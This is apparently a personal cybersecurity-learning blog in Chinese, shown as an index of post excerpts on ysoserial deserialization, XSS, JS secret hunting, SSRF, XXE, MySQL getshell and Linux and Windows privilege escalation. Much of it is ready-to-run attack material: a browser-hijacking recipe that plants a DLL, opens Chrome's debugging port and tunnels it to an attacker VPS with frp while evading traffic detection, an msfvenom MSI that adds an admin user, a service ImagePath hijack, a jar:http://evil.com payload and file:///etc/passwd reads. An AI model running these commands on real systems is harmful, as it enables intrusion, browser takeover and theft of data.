Posts on Cybersecurity learning

Yso

Fri, 10 Apr 2026 23:50:39 +0800

JAVA_YSO

基础命令格式

java -jar ysoserial.jar [利用链] [执行的命令]

利用链: CommonsCollections1, URLDNS, Jackson 等

探测/检测

如果不确定对方是否存在反序列化漏洞,或者不清楚使用了哪些依赖库可以使用URLDNS

java -jar ysoserial.jar URLDNS "http://your-dnslog-url.com"

注: 如果执行复杂命令最好封装成脚本执行,或者使用sh -c/bash -c

.net_yso

基础命令

ysoserial.exe -g [Gadget] -f [Formatter] -c "[Command]" -o 编码

-g 利用链的名称,如TextFormattingRunProperties
-f 序列化类型,如 BinaryFormatter, Json.Net, ObjectStateFormatter
-c 执行的命令
-o 编码处理,如 raw ,bash64, urlencode

利用 (web Machinekey泄露)

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c echo pwned > C:\windows\temp\test.txt" --validationkey="你的KEY" --validationalg="SHA1"

技巧

- p 参数可以指定插件,对一些特定目标进行测试

-p ViewState：处理 ASP.NET ViewState。
-p ActivitySurrogateSelector：，可以绕过较新的 .NET 补丁，实现无文件落地执行任意 C# 代码。

利用链:

浏览器劫持

Mon, 30 Mar 2026 21:28:24 +0800

实现方式:

开启远程调试端口

首先将dll插入浏览器目录后,使用命令将对方的远程调试端口开起来chrome.exe --remote-debugging-port=9222 --remote-allow-origins=* --headless

--remote-debugging-port 指定端口
--remote-allow-origins 避免403
--headless 避免弹窗

注: 如果对方已经开启浏览器需要将浏览器关闭后才能运行插入的dll,关闭浏览器命令taskkill /F /IM chrome.exe /T

开启端后查看端口是否在运行监听netstat -ano | findstr :9222

打隧道

通过frp打通隧道frpc配置

[common]
# 你的 VPS 公网 IP
server_addr = x.x.x.x
server_port = 7000
token = my_secure_token_123
[chrome_debug]
type = tcp
local_ip = 127.0.0.1
# 对应 Chrome 启动时的 --remote-debugging-port
local_port = 9222
# 映射到 VPS 上的端口（确保 VPS 防火墙已开放此端口）
remote_port = 19222
# 【实战建议】开启加密和压缩，躲避流量检测
use_encryption = true
use_compression = true

frps

XSS

Thu, 19 Mar 2026 00:33:54 +0800

逃逸手法分类/选择:

**HTML标签内部:**如在<div> xxx </div>中

逃逸: 直接闭合标签</div> <script>alert(1)</script>
HTML属性内部:<input type="text" value="xxxx">

逃逸:

一. 闭合属性,添加事件或者闭合标签 " onmouseover="alert(1)或者

"> <script>alert(1)</script>
Javascript变量内: <script> var name = 'xxxx'; </script>

逃逸: 闭合单引号或者标签,闭合或者注释掉后面的代码, '; alert(1); //
DOM渲染: 数据不回传服务器，直接被前端 JS（如 .innerHTML、eval()）接收并渲染。

挖掘思路

输入框测试: 先看源代码,输入的数据在什么里面,再测试能不能截断或者添加事件等方法,输入绕过的字符如: ' " < > / ; \等,观察源代码哪一个被过滤了

变成< 说明做了实体编码
没有变化,说明有xss的可能

其他测试点:

json报错页面: 很多 API 报错时会原样回显你输入的非法 JSON 字段
配合文件上传

https://www.freebuf.com/vuls/418170.html 可以看这篇文章
HTTP头(盲XSS) 在 Referer、User-Agent、X-Forwarded-For 中注入盲打 Payload，盲打后台

绕过:

使用不太常见的标签或者事件:

这里推荐一个网站 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
编码绕过:

浏览器解析 HTML 时有特定的解码顺序（HTML 解码 -> URL 解码 -> JS 解码）

JS

Sat, 28 Feb 2026 22:41:23 +0800

本人代码能力不是很好，对很多网站框架和文件理解不是很深，所以看js文件的时候难免有些困难，所以有了这篇文章

JS审计技巧

遇到source.map(.map)可以直接还原源码

首先是一些用来搜索的正则：

api/| /v[0-9]|/admin|/internal|/private
key:|secret:|token:|password:|apikey|sk_ |pk_ |AKIA（AWS）
fetch|axios|XMLHttpRequest|$.post|$.ajax
localStorage|sessionStorage|cookie
if\s*\(\s*user\.role|isAdmin|level|permission
innerHTML|eval|document\.write（XSS sink）

看完上面这些，还要看什么？

密钥

如: const KEY = "xxx"、process.env.VITE_xxx（Vite 常见泄露）、client_secret。

如config.chunk.js 里：

const stripeConfig = {
 publishableKey: "pk_live_51Hb...xxxx", // Stripe 真实密钥
 clientSecret: "sk_test_51Hb...xxxx"
};

var fallbackSecret = "supersecret2025!@#"; // 备用密钥

API

可以用上面的正则去搜

逻辑/授权检查

如: if (user.isAdmin)、if (role === 'vip')、if (canEdit)。

if (user.vipLevel >= 3) {
 showDownloadButton(); // 前端判断
} else {
 hideIt();
}

加密/签名

如CryptoJS、encrypt、sign、md5、rsa 函数。

password: CryptoJS.AES.encrypt(pwd, 'hardcoded_key_123').toString()

逆向出密钥，就能批量撞库或伪造登录

不用看的JS

第三方库完整代码jquery-3.6.0.min.js、lodash.min.js、react.production.min.js 全文件。 → 只看最上面注释的版本号（查 CVE），其余不看。

一些框架的打包，如React/Vue/Next.js 的

_createElementVNode, useState, render() { ... }

还有一些轮番图片等

Java基础

Mon, 16 Feb 2026 00:00:00 +0000

JAVA 反射

什么是java的反射

java反射就是在程序运行状态中，能够知道任何一个类的所有属性和方法，并且能够调用这些属性和方法的功能

正向 VS 反向

正向流程： 导入类 –> new对象 –> 调用对象

User user = new User(); user.login();

如果类不存在就报错

**反向流程：**拿到字符串类名 –> 让JVM去找这个类 –> 强行拆解这个类 –> 调用里面的东西

Class.forName("com.User").getMethod("login").invoke(obj);

动态加载类，即使编译时类还没有也能运行

类加载机制

什么是类加载

java代码进行编译后就是.class文件（字节码），类加载就是把这些二进制数据读进内存，解析并生成一个java.lang.Class对象的过程

类加载的三个阶段

Loading（加载） 读取字节流，不执行代码
Linking（链接） 分为验证，准备，解析。 一般不执行代码
lnitialization(初始化) 执行静态代码块，静态变量的赋值动作

两种攻击方式：

例子：
class Evil {
 // 1. 静态变量赋值
 public static int a = runCommand();

 // 2. 静态代码块
 static {
 System.out.println("静态代码块被执行了");
 }

 public static int runCommand() {
 System.out.println("静态变量赋值触发了恶意方法！");
 return 1;
 }
}

会会先执行赋值，然后是静态代码块。因为初始化执行的顺序是 “静态变量赋值” 和 “静态代码块”

Linux提权

Sun, 15 Feb 2026 00:00:00 +0000

常规提权方式

一、sudo滥用提权

sudo -l提示要输入密码的原因:

默认SUDO行为 : 需要输入当前用户的密码(不是root)密码
sudoers配置问题: 未配置免密码访问在/etc/sudoers文件中没有为当前用户配置NOPASSWD选项
配置覆盖问题: 用户组覆盖了用户配置,可能被添加到了wheel用户组
1. 检查当前用户所在组
```
id username
```
1. 如果发现在wheel组中,检查wheel组的配置
  
  查看%wheel相关配置,看是否设置了NOPASSWD或要求密码
```
sudo visudo
```
2. 从wheel组中移除用户
```
sudo gpasswd -d username wheel
```

利用步骤：

查看当前用户sudo权限：
```
sudo -l
```
- 示例输出：(ALL) NOPASSWD: /usr/bin/vim
利用vim提权：
```
sudo /usr/bin/vim
```
- 在vim中输入 :set shell=/bin/bash 回车
- 然后输入 :shell 回车
- 成功获得root shell
利用其他命令提权：
- 如果发现可以执行/usr/bin/nano：
```
sudo /usr/bin/nano
```
  - 在nano中按Ctrl+R，输入!bash，回车
  - 即可获得root shell

说明：

sudo配置不当，允许用户以root身份执行特定命令，而无需密码验证。

二、SUID特殊权限提权

利用步骤：

查找SUID文件：
```
find / -perm -u=s -type f 2>/dev/null
```

利用/bin/mount提权：

mkdir /tmp/mount
touch /tmp/mount/malicious_file
sudo /bin/mount -o bind /tmp/mount /tmp/mount
sudo /bin/mount /tmp/mount /tmp/mount

通过此方式可获取root权限

利用/bin/ping提权：

SSRF

Sun, 15 Feb 2026 00:00:00 +0000

伪协议

PHP

http/s:// 常用于探测存活主机和开放端口,配合burp

https://example.com/title?title=http://127.0.0.1:6379

file:// 读取文件内容

file:///etc/passwd

dict:// 字典服务协议，可以通过这个协议执行一些指令.但是dict很难完成复杂的认证，他每次发送的请求都是新建立的连接

dict://127.0.0.1:6379/info

gopher:// gopher协议可以伪造任何基于TCP的应用层协议报文（java不支持）

gopher://<host>:<port>/_<payload>
_ : 占位符。gopher协议在传输中会吃掉路径后的第一个字符
<payload> : 经过URL编码的原始tcp数据流

JAVA

file:// 协议与 PHP 类似

可以读取本地文件：file:///etc/passwd。

netdoc:// 协议它允许你访问并提取 jar 包中的内容。

Payload: netdoc:///etc/passwd

jar:// 协议它允许你访问并提取 jar 包中的内容。

语法： jar:{url}!/{entry}
用法： jar:http://evil.com/test.jar!/com/test/Main.class
利用点：
1. 让服务器去下载远程恶意 jar 包。
2. 读取本地 classpath 下的配置文件。
3. 结合某些反序列化漏洞，控制类加载过程。

绕过

IP地址

进制转换： 浏览器和许多网络库支持非十进制的 IP。
八进制： 0177.0.0.1
十六进制： 0x7f.0x0.0x0.0x1
十进制整数（最隐蔽）： 将 IP 换算成一个超大数字。127.0.0.1 ----> 2130706433
特殊省略写法：
127.0.0.1 可以写成 127.1 或 127.0.1。
0.0.0.0 在 Linux 下通常也会指向本地。
IPv6 绕过：
使用 [::1] 代表 127.0.0.1。
使用 IPv6 格式的内网地址。

利用DNS

Windows提权

Sun, 15 Feb 2026 00:00:00 +0000

Windows工作组环境和域环境提权方式详解

一、工作组环境提权方式

1. AlwaysInstallElevated提权

条件：

系统已启用AlwaysInstallElevated（注册表值为1）

检查方法：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

利用步骤：

生成恶意MSI文件（在Kali Linux中）：
```
msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd -f msi -o add.msi
```
如果在Windows上操作，可以使用在线工具生成MSI文件
在Windows上执行：
```
msiexec /i add.msi
```
验证提权：
```
net user hacker
```

成功标志：看到hacker账户，且在管理员组中

2. 服务权限配置错误提权

条件：

服务路径权限配置错误
当前用户对服务可执行文件或目录有写权限

检查方法：

sc query
winpeas.exe quiet notcolor serviceinfo

利用步骤：

找到一个服务（如Spooler）：
```
sc qc Spooler
```

修改服务路径：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /t REG_EXPAND_SZ /v ImagePath /d "C:\evil\shell.exe" /f

重启服务：

PHP反序列化

Sat, 07 Feb 2026 00:00:00 +0000

距离第一次学习php反序列已经很长时间了，初次学习时就学的迷迷糊糊，有很多理解不到位的地方，正好最近有时间打算回过头重新开始学习一遍，理解不到位之处请各位大佬多多指正。

为什么需要序列化和反序列化？

网络传输只能处理位流(Bytes) , 当你在java,php,python中定义一个复杂的用户对象，但是路由器并不认识，只能通过序列化成字符串的方式以字节流的方式传输，传输流程大致如下：

服务器对象–> 序列化–> 字节流–> 网络传输–> 反序列化–> 客户端
内存(RAM)易失，程序运行在内存中，一旦断电，关闭数据就会消失

php中的序列化反序列化函数

序列化：serialize()

反序列化：unserialize()

漏洞利用

前提: 服务端(不论是当前代码还是所包含的代码中)必须要有对象(序列化形式)所对应的类, 否则无法反序列化

例如: payload:O:1:"**S**":1:{s:4:"test";s:29:"<script>alert('xss')</script>";} 这时候如果服务端没有一个叫做S的类, 就会反序列化失败

所以说, 想要发起反序列化攻击, 必要条件之一: 必须知道服务端有哪些类

魔术方法

注:加黑重点关注

魔术方法	描述
`__construct()`	构造方法，当对象被实例化（`new`）时自动调用。
`__destruct()`	析构方法，当对象被销毁时自动调用。反序列化攻击中最常见的入口。
`__call()`	在对象上下文中调用一个不可访问或不存在的方法时触发。常用的跳板。
`__callStatic()`	在静态上下文中调用一个不可访问或不存在的方法时触发。
`__get()`	读取对象中不可访问（未定义或私有）的属性时触发。常用的跳板。
`__set()`	写入对象中不可访问（未定义或私有）的属性时触发。
`__isset()`	使用 `isset()` 或 `empty()` 检查对象中不可访问的属性时触发。
`__unset()`	使用 `unset()` 删除对象中不可访问的属性时触发。
`__sleep()`	当对象被 `serialize()` 序列化前触发，通常用于返回需要被序列化的属性列表。
`__wakeup()`	当对象被 `unserialize()` 反序列化时触发，常用于初始化资源。反序列化的“点火开关”。
`__toString()`	当对象被转换成字符串（如 `echo` 或拼接）时自动调用。核心跳板。
`__invoke()`	当尝试以函数方式调用对象（如 `$obj()`）时触发。常用的跳板。
`__clone()`	当对象使用 `clone` 关键字被克隆时调用。
`__serialize()`	PHP 7.4+ 引入。序列化前触发，优先级高于 `__sleep`。返回一个包含对象数据的数组。
`__unserialize()`	PHP 7.4+ 引入。反序列化后触发，优先级高于 `__wakeup`。用于恢复对象状态。
`__set_state()`	当使用 `var_export()` 导出类时触发。必须是静态方法，返回类实例。
`__debugInfo()`	当使用 `var_dump()` 打印对象信息时触发，用于控制显示的属性。

1、 __construct() 和 __destruct()

XML 漏洞详解

Wed, 04 Feb 2026 00:00:00 +0000

XML漏洞

理论：

xml是一种用来传输和存储数据的格式，长得有些像HTML

<user>
<username>admin</username>
<role>manager</role>
</user>

要学习XML就要先学习DTD

什么是DTD？

DTD（文档类型定义）使用来定义xml文档的合法结构。重点在于DTD允许定义实体也就是Entity，而他也就是漏洞的根源

他有些像编程语言中的变量，举两个例子

内部实体
<!DOCTYPE root [
<!ENTITY name "h4xk0r">
]>
<root>Hello &name;</root>

外部实体----这是漏洞的核心，xml允许从外部通过url或文件路径加载数据
语法关键字 SYSTEM 或 PUBLIC
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;<root>
如果在实际过程中后端接收了你的XML，并且解析了&xxe这个变量，那么就可以通过构造SYSTEM后面的路径，让服务器读取文件，探测内网

实战向：

怎么去寻找漏洞点：

显式的XML接口：

如果请求头是 Content-Type: application/xml 或 text/xml，且数据包体是 XML，那么可以直接插入payload进行测试，但是感觉现在很少了

隐式接口（content-Type欺骗）：

假设一个api接口是这样的：
POST /api/login HTTP/1.1
Content-Type: application/json
{"user": "admin", "pass": "123"}
很多框架为了兼容性，会根据Content-Type切换解析器，所以我们构造payload
POST /api/login HTTP/1.1
Content-Type: application/xml <-- 修改这里
<?xml version="1.0" ?>
<user>admin</user>
<pass>123</pass>
如果这时候服务器没有报错说明支持xml格式，那么就可以构造payload测试xxe漏洞了

文件上传（SVG与office）–这个是比较容易被忽视的点

svg：是一种图片格式的矢量图。微信头像，网站logo上传处

Execl/Word（.xlsx/.docx）: 本质是ZIP包，解压后是XML。简历上传，报表导入处

MySQL getshell

Fri, 30 Jan 2026 00:00:00 +0000

UDF (–os-shell)

利用条件

数据库为DBA,可以使用sqlmap的--is-dba查看当前网站连接的数据库账户是否是管理员

secure_file_priv没有具体值

查找:
1. --sql-shell
1. 进入数据库后: SHOW VARS LIKE 'secure_file_priv';
2. 盲注:使用length()函数推测: ?id=1 AND (SELECT @@secure_file_priv) IS NULL
返回正常则null,无法写入
页面异常则,则不是null
判断是否为空:
?id=1 AND length(@@secure_file_priv) = 0 页面正常则为空
3. 尝试写入文件: ?id=1 INTO OUTFILE '/var/www/html/test.txt' -- 根据报错信息判断
4.权限检查: ?id=1 AND (SELECT user_privileges FROM information_schema.user_privileges WHERE privilege_type='FILE' AND grantee=CONCAT("'", (SELECT CURRENT_USER()), "'")) IS NOT NULL 即使secure_file_priv为空,用户没有FILE权限,也无法写入
或者
AND (SELECT 1 FROM mysql.user LIMIT 1)，如果能访问 mysql 库，通常意味着是高权限。

知道网站的绝对路径

查找:
1. 注入报错信息
2. 利用内部函数和元数据:
Apache (Ubuntu): UNION SELECT 1, load_file('/etc/apache2/sites-enabled/000-default.conf'), 3
Nginx: UNION SELECT 1, load_file('/etc/nginx/nginx.conf'), 3
Windows (IIS): C:\Windows\System32\inetsrv\config\applicationHost.config
3.常见的默认路径:
Linux (Apache) /var/www/html/, /var/www/www.example.com/
Linux (Nginx) /usr/share/nginx/html/, /var/www/html/
Windows (IIS) C:\inetpub\wwwroot\
Windows (XAMPP) C:\xampp\htdocs\
Windows (phpStudy) D:\phpstudy_pro\WWW\, C:\phpStudy\WWW\

漏洞复现

方法一: –os-shell

Mon, 01 Jan 0001 00:00:00 +0000

C 语言学习

学习c语言是为了后面学习免杀,记录一下学习过程方便温习

基础知识

程序执行的两种方式:

解释: 借助一个程序,读懂你写的程序去执行
编译: 借助一个程序,把你的程序翻译成计算机懂得语言–机器语言–写的程序,然后执行(整体转换为机器码后，由系统直接调度执行)

整数类型

类型	存储大小	值范围
char	1 字节	-128 到 127 或 0 到 255
unsigned char	1 字节	0 到 255
signed char	1 字节	-128 到 127
int	2 或 4 字节	-32,768 到 32,767 或 -2,147,483,648 到 2,147,483,647
unsigned int	2 或 4 字节	0 到 65,535 或 0 到 4,294,967,295
short	2 字节	-32,768 到 32,767
unsigned short	2 字节	0 到 65,535
long	4 字节	-2,147,483,648 到 2,147,483,647
unsigned long	4 字节	0 到 4,294,967,295

一个demo:

Posts on Cybersecurity learning

Yso

JAVA_YSO

基础命令格式

探测/检测

.net_yso

浏览器劫持

实现方式:

开启远程调试端口

打隧道

XSS

逃逸手法分类/选择:

挖掘思路

绕过:

JS

JS审计技巧

看完上面这些，还要看什么？

不用看的JS

Java基础

JAVA 反射

什么是java的反射

正向 VS 反向

类加载机制

什么是类加载

类加载的三个阶段

两种攻击方式：

Linux提权

常规提权方式

一、sudo滥用提权

利用步骤：

说明：

二、SUID特殊权限提权

利用步骤：

SSRF

伪协议

PHP

JAVA

绕过

Windows提权

Windows工作组环境和域环境提权方式详解

一、工作组环境提权方式

1. AlwaysInstallElevated提权

2. 服务权限配置错误提权

PHP反序列化

为什么需要序列化和反序列化？

php中的序列化反序列化函数

漏洞利用

魔术方法

XML 漏洞详解

XML漏洞

理论：

实战向：

怎么去寻找漏洞点：

MySQL getshell

UDF (–os-shell)

利用条件

漏洞复现

C 语言 学习

基础知识

程序执行的两种方式:

整数类型

C 语言学习